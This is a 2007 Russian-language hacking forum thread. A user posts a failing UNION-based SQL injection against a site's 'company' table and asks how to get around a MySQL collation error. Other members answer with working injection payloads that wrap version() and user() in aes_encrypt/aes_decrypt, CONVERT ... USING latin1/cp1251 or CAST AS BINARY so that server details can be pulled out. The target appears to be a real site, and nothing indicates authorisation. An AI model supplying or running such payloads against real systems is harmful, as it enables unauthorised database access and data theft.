code to sql injection, help

Discussion in 'Песочница' started by rubik-nerubik, 28 Sep 2007.

  1. rubik-nerubik

    rubik-nerubik Elder - Старейшина

    Joined:
    4 May 2007
    Messages:
    248
    Likes Received:
    9
    Reputations:
    -2
    выручайте, нужно прально зафигачить допустим version() в этой коде:


    Code:
    Error: SELECT * from company WHERE company_id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24 from company/*
    Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
     
  2. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Пробуем
    Code:
    -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,aes_decrypt(aes_encrypt(version(),1),1),22,23,24 from company/*
     
    2 people like this.
  3. rubik-nerubik

    rubik-nerubik Elder - Старейшина

    Joined:
    4 May 2007
    Messages:
    248
    Likes Received:
    9
    Reputations:
    -2
    ok плюс кинул
     
  4. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    aes_decrypt(aes_encrypt(version(),0x71),0x71) поздно =\
     
  5. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    либо convert(version() using latin1)
     
  6. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    http://www.sysman.ru/index.php?showtopic=13530
    +union+select+convert(user() using cp1251)
    CAST(user AS BINARY).
     
    #6 Azazel, 28 Sep 2007
    Last edited: 28 Sep 2007